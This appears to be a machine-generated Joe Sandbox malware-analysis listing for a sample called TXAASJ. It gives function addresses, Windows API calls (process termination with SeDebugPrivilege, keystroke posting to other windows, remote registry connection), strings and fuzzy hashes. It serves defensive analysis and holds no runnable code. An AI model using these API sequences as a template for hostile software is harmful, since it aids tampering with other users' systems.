                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InvalidateRect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 634782764-0
                                                                                                                        • Opcode ID: c193e65aa978ce9fb706cfb53089ad2c9d6f3f86ca35ba2c42d607264d49b2c2
                                                                                                                        • Instruction ID: 9bee8da436b1fbf5da51cd390c6819c13ee8e6d6823b055c1ee15c36b166da88
                                                                                                                        • Opcode Fuzzy Hash: c193e65aa978ce9fb706cfb53089ad2c9d6f3f86ca35ba2c42d607264d49b2c2
                                                                                                                        • Instruction Fuzzy Hash: 2B51A030605204BEEB209F69DC95BDF3BA9AB06358F206112FA55F61B2C7F1E9808B50
                                                                                                                        Function 00E6A599 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00ECE9EA
                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00ECEA0B
                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00ECEA20
                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00ECEA3D
                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00ECEA64
                                                                                                                        • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00E6A57C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00ECEA6F
                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00ECEA8C
                                                                                                                        • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00E6A57C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00ECEA97
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1268354404-0
                                                                                                                        • Opcode ID: 1599ef3a0b47ef83b28e6dcae62fc812c53ccddecd9fba9455c9676309579352
                                                                                                                        • Instruction ID: 33ca04bf20d174556b60cc8cca9a441dc9f8aca809a3b19c78ac42ee2f62195a
                                                                                                                        • Opcode Fuzzy Hash: 1599ef3a0b47ef83b28e6dcae62fc812c53ccddecd9fba9455c9676309579352
                                                                                                                        • Instruction Fuzzy Hash: 1A517870A40208EFDB20CF29EC81FAA77E5BB083A4F145629F956B7290D771EC819F50
                                                                                                                        Function 00E6F6B5 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00ECE9A0,00000004,00000000,00000000), ref: 00E6F737
                                                                                                                        • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00ECE9A0,00000004,00000000,00000000), ref: 00E6F77E
                                                                                                                        • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00ECE9A0,00000004,00000000,00000000), ref: 00ECEB55
                                                                                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00ECE9A0,00000004,00000000,00000000), ref: 00ECEBC1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ShowWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1268545403-0
                                                                                                                        • Opcode ID: c0b00f3edd556b98a78f785f24be66c2a88a7952aabad1e340eebc35fd776d16
                                                                                                                        • Instruction ID: 501e14b9e0decf257f1d6dc42f92aa9e669151bfda03489945a64c471a7bd9cc
                                                                                                                        • Opcode Fuzzy Hash: c0b00f3edd556b98a78f785f24be66c2a88a7952aabad1e340eebc35fd776d16
                                                                                                                        • Instruction Fuzzy Hash: 81415E302686809EDB344B38BDC8BBA7BD5AB0539AF24382FE05772562CA71FC45D751
                                                                                                                        Function 00E97E6F Relevance: 13.6, APIs: 9, Instructions: 135filestringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E531B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00E531DA
                                                                                                                          • Part of subcall function 00E97C0C: GetFileAttributesW.KERNEL32(?,00E96A7B), ref: 00E97C0D
                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00E97ED2
                                                                                                                        • _wcscmp.LIBCMT ref: 00E97EEA
                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00E97F03
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AttributesFullMoveNamePath_wcscmplstrcmpi
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4093841705-0
                                                                                                                        • Opcode ID: 300abb7eb32c15b4f198c4d988cd7076249dacc8243e02d9e49fbf890dd152b1
                                                                                                                        • Instruction ID: 37e7eb990af4674d001a2828b33bea061b98dd6e89d859ee5f8fe306da385ca9
                                                                                                                        • Opcode Fuzzy Hash: 300abb7eb32c15b4f198c4d988cd7076249dacc8243e02d9e49fbf890dd152b1
                                                                                                                        • Instruction Fuzzy Hash: DF4143B1905219AACF24EBA4DC45ADDB3BCAF08310F5065DAE549B3151EB309B8DCFA4
                                                                                                                        Function 00E8CDE6 Relevance: 13.6, APIs: 9, Instructions: 65sleepkeyboardwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E8E138: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E8E158
                                                                                                                          • Part of subcall function 00E8E138: GetCurrentThreadId.KERNEL32 ref: 00E8E15F
                                                                                                                          • Part of subcall function 00E8E138: AttachThreadInput.USER32(00000000,?,00E8CDFB,?,00000001), ref: 00E8E166
                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E8CE06
                                                                                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00E8CE23
                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00E8CE26
                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E8CE2F
                                                                                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00E8CE4D
                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00E8CE50
                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E8CE59
                                                                                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00E8CE70
                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00E8CE73
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2014098862-0
                                                                                                                        • Opcode ID: 81458748bf680434fbe1185c6980047ea5bf8088774976c8348d8af4f404f308
                                                                                                                        • Instruction ID: b2851fd53d2d9d3b212047050384f9b2a62b520cc3c2b5f45915757abe5812ce
                                                                                                                        • Opcode Fuzzy Hash: 81458748bf680434fbe1185c6980047ea5bf8088774976c8348d8af4f404f308
                                                                                                                        • Instruction Fuzzy Hash: 1011E1B1551618BEF7102F619C8EF6A3B6DDB08764F200416F2497B1E0C9F2AC019BB4
                                                                                                                        Function 00E8BFF5 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00E8BC1D,00000B00,?,?), ref: 00E8BFFE
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00E8BC1D,00000B00,?,?), ref: 00E8C005
                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E8BC1D,00000B00,?,?), ref: 00E8C01A
                                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00E8BC1D,00000B00,?,?), ref: 00E8C022
                                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00E8BC1D,00000B00,?,?), ref: 00E8C025
                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00E8BC1D,00000B00,?,?), ref: 00E8C035
                                                                                                                        • GetCurrentProcess.KERNEL32(00E8BC1D,00000000,?,00E8BC1D,00000B00,?,?), ref: 00E8C03D
                                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00E8BC1D,00000B00,?,?), ref: 00E8C040
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,00E8C066,00000000,00000000,00000000), ref: 00E8C05A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1957940570-0
                                                                                                                        • Opcode ID: 203ae5b42fcd3868df21ceb0d75a86326998ae4645e4c989de201169e0510ee0
                                                                                                                        • Instruction ID: a301fa67e690d0a7e1f8fdd06e17d1ec5d5d6501923c1b1ca125b970e29941a9
                                                                                                                        • Opcode Fuzzy Hash: 203ae5b42fcd3868df21ceb0d75a86326998ae4645e4c989de201169e0510ee0
                                                                                                                        • Instruction Fuzzy Hash: 6E01CDB5645304BFE710AFA6EC4DF6B7BACEB89B11F004411FA05EB1A1CA709804CB71
                                                                                                                        Function 00EAC8B7 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                        • API String ID: 0-572801152
                                                                                                                        • Opcode ID: c1d3150d80a02575ef2411cd8843ba36d9d4d284a871aaf23dcf9e428170d30b
                                                                                                                        • Instruction ID: f966fefc54c8b7a24ce441417447c714e46fdb4c6d3454496f585e9b22f35818
                                                                                                                        • Opcode Fuzzy Hash: c1d3150d80a02575ef2411cd8843ba36d9d4d284a871aaf23dcf9e428170d30b
                                                                                                                        • Instruction Fuzzy Hash: C8E1B171A00219AFDF10DF68D881BAEB7F5EF4D354F245429E94ABB281D770AD41CBA0
                                                                                                                        Function 00EB9882 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00EB9926
                                                                                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 00EB993A
                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00EB9954
                                                                                                                        • _wcscat.LIBCMT ref: 00EB99AF
                                                                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00EB99C6
                                                                                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00EB99F4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window_wcscat
                                                                                                                        • String ID: SysListView32
                                                                                                                        • API String ID: 307300125-78025650
                                                                                                                        • Opcode ID: 0f63054007eb2e855ba6e27dc4dc37788a18011619f549cf67244d065fd06fa2
                                                                                                                        • Instruction ID: a21a3804aa01842c1cebcbc3b0e40e09d8ddb445ff704b936a941e3e1205da48
                                                                                                                        • Opcode Fuzzy Hash: 0f63054007eb2e855ba6e27dc4dc37788a18011619f549cf67244d065fd06fa2
                                                                                                                        • Instruction Fuzzy Hash: FA419E71A00308AFEB219F64CC85BEF77E8EF48354F10546AF699F7292D6719984CB60
                                                                                                                        Function 00EB1620 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E96F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00E96F7D
                                                                                                                          • Part of subcall function 00E96F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00E96F8D
                                                                                                                          • Part of subcall function 00E96F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00E97022
                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EB168B
                                                                                                                        • GetLastError.KERNEL32 ref: 00EB169E
                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EB16CA
                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00EB1746
                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 00EB1751
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00EB1786
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                        • String ID: SeDebugPrivilege
                                                                                                                        • API String ID: 2533919879-2896544425
                                                                                                                        • Opcode ID: 2ba44f2a326e8ca857c6ef6574201cb3d5c83d3754d3eee22c78d99940e09ab3
                                                                                                                        • Instruction ID: 75fe90a29ba3300b4821ae1fdd3972feac868f272db017cd9137f566e011173e
                                                                                                                        • Opcode Fuzzy Hash: 2ba44f2a326e8ca857c6ef6574201cb3d5c83d3754d3eee22c78d99940e09ab3
                                                                                                                        • Instruction Fuzzy Hash: 8C41CD71640211AFDB04EF54DCA5FAEB7E5AF45314F08904AFA06BF292EB75E804CB91
                                                                                                                        Function 00E96237 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 00E962D6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: IconLoad
                                                                                                                        • String ID: blank$info$question$stop$warning
                                                                                                                        • API String ID: 2457776203-404129466
                                                                                                                        • Opcode ID: c1f64d8f752d27d07adff6ea33ee23baf2ed412d380c97492f5c48c8a6bdff92
                                                                                                                        • Instruction ID: 223a3b86e7d798f96d6e91285f8fcc8c7aee401453714b139d1e8bac15b7c188
                                                                                                                        • Opcode Fuzzy Hash: c1f64d8f752d27d07adff6ea33ee23baf2ed412d380c97492f5c48c8a6bdff92
                                                                                                                        • Instruction Fuzzy Hash: 9D110632208342BEEF015B599C52DAA77DC9F16328B20106BF505B62D2EBA1AA405269
                                                                                                                        Function 00E9757B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 00E97595
                                                                                                                        • LoadStringW.USER32(00000000), ref: 00E9759C
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00E975B2
                                                                                                                        • LoadStringW.USER32(00000000), ref: 00E975B9
                                                                                                                        • _wprintf.LIBCMT ref: 00E975DF
                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E975FD
                                                                                                                        Strings
                                                                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 00E975DA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                        • API String ID: 3648134473-3128320259
                                                                                                                        • Opcode ID: 53d9a710265e98ede25dbef2a6172039ff3fd42ef1a4f908c53d56058d8861c0
                                                                                                                        • Instruction ID: ef3653e5796cd88a9a651becc18f2e94a28d3764b0f7daf515e063f9ce61e3c1
                                                                                                                        • Opcode Fuzzy Hash: 53d9a710265e98ede25dbef2a6172039ff3fd42ef1a4f908c53d56058d8861c0
                                                                                                                        • Instruction Fuzzy Hash: 3A0181F2905208BFEB11A7A5EC89EEB776CDB08300F001496B746F2041EA749E888B71
                                                                                                                        Function 00EB2A0A Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                          • Part of subcall function 00EB3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EB2AA6,?,?), ref: 00EB3B0E
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EB2AE7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharConnectRegistryUpper_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3479070676-0
                                                                                                                        • Opcode ID: 2812bb7870024b45da372bdcd0679de0a5293250f24d8b71f7e7e6e0e9c0b7fd
                                                                                                                        • Instruction ID: c26ff8d546de4f156af832ccca14dc9ce2f39ef17767e7f9e53c154470376023
                                                                                                                        • Opcode Fuzzy Hash: 2812bb7870024b45da372bdcd0679de0a5293250f24d8b71f7e7e6e0e9c0b7fd
                                                                                                                        • Instruction Fuzzy Hash: 99916C712042019FCB10EF54C895BAEBBE5FF84354F14981DFA96A72A1DB31E945CF42
                                                                                                                        Function 00E7B72C Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __mtinitlocknum.LIBCMT ref: 00E7B744
                                                                                                                          • Part of subcall function 00E78A0C: __FF_MSGBANNER.LIBCMT ref: 00E78A21
                                                                                                                          • Part of subcall function 00E78A0C: __NMSG_WRITE.LIBCMT ref: 00E78A28
                                                                                                                          • Part of subcall function 00E78A0C: __malloc_crt.LIBCMT ref: 00E78A48
                                                                                                                        • __lock.LIBCMT ref: 00E7B757
                                                                                                                        • __lock.LIBCMT ref: 00E7B7A3
                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00F06948,00000018,00E86C2B,?,00000000,00000109), ref: 00E7B7BF
                                                                                                                        • EnterCriticalSection.KERNEL32(8000000C,00F06948,00000018,00E86C2B,?,00000000,00000109), ref: 00E7B7DC
                                                                                                                        • LeaveCriticalSection.KERNEL32(8000000C), ref: 00E7B7EC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1422805418-0
                                                                                                                        • Opcode ID: 26a8d9f60912274e7726998a7bddabb836ec9d18ff4dd895f74ffe81f58d2c8a
                                                                                                                        • Instruction ID: d314912f19405159061fdfea6fd999a08a3ead12453e881f7ce69c1bcdcba792
                                                                                                                        • Opcode Fuzzy Hash: 26a8d9f60912274e7726998a7bddabb836ec9d18ff4dd895f74ffe81f58d2c8a
                                                                                                                        • Instruction Fuzzy Hash: 33412471D002158BFB189FA8D9443ACB7A4BF50339F10D32AE42DBB2D1DB749841CB91
